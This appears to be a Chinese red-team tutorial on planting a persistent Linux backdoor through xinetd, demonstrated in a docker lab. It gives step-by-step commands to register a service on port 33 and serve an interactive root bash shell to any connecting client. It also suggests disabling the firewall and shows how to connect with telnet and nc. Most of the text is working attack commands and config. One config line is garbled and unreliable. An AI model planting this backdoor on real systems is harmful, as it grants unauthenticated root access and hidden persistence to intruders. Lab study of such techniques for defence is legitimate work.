Linux后门大全-xinetd后门(二)

环境

靶机:centos7.6
攻击机:Linux

使用docker搭建靶机环境,当然也可以不使用docker,直接跳过创建容器的步骤即可

创建容器

#创建名为backdoorT4的特权容器,并使用/usr/sbin/init,因为容器默认不开启system服务,所以得使用特权容器开启,不然后续无法使用systemctl命令
docker run -itd --name backdoorT4 --privileged=true centos:7.6.1810 /usr/sbin/init
# 检查容器创建结果
docker ps -a|grep "backdoorT4"
#进入容器
docker exec -it backdoorT4 /bin/bash

安装xinetd

#在容器内执行:
yum install xinetd -y
#也可以安装firewalld,后续可以使用这个关闭防火墙,或者使用iptables
yum install firewalld -y

修改配置并启动

  • 首先需要自定义一个服务并绑定
#自定义一个名为testcn的服务,绑定端口为33,协议tcp,当然你也可以自定义其他名字和端口,切勿与现有的重复
echo "testcn          33/tcp" >> /etc/services
#检查添加结果
cat /etc/services |grep "testcn"

在这里插入图片描述

  • 修改xinetd配置
#创建配置文件并添加内容
cat > /etc/xinetd.d/testcn << EOF  #根据自己定义的服务名相应的修改文件名
{
        disable         = no				#开启
        id              = testcn-stream	
        wait            = no		
        socket_type     = stream			#使用tcp,如果使用udp,修改成dgram
        protocol        =  socket type is usually enough
        user            = root
        server          = /bin/bash			#此属性为执行程序,下一个属性为其参数,合在一起的意思就是/bin/bash -i,提供一个交互式shell
        server_args     = -i
        port            = 33				#监听端口,服务绑定的是哪个就填哪个
}
EOF
#启动
systemctl start xinetd
#要使得后门生效一定要让防火墙放开相应得端口,这里的端口号是33。防火墙开放端口的命令太长不记得了,直接关闭防火墙也可以
systemctl status firewalld
#检查xinetd进程和端口33是否启动了
netstat -ltupan|grep xinetd
tcp6       0      0 :::33                   :::*                    LISTEN      5567/xinetd

连接后门

使用攻击机访问靶机的端口。有很多种方法可以连接。一般的,只要支持tcp协议的工具都能连接

#在攻击机上执行
#1.使用telnet连接
telnet  172.17.0.2 33
#连接成功后就可以执行其他命令了

#2.使用nc连接
nc -v 172.17.0.2 33

Linux后门大全-xinetd后门(二)_第1张图片

至此,此后门的使用方法您已经学会了!!!
注:如果操作系统不好安装,可以尝试使用docker安装,方便快捷。

你可能感兴趣的:(Linux学习笔记,Linux后门,红队测试,linux,安全,docker)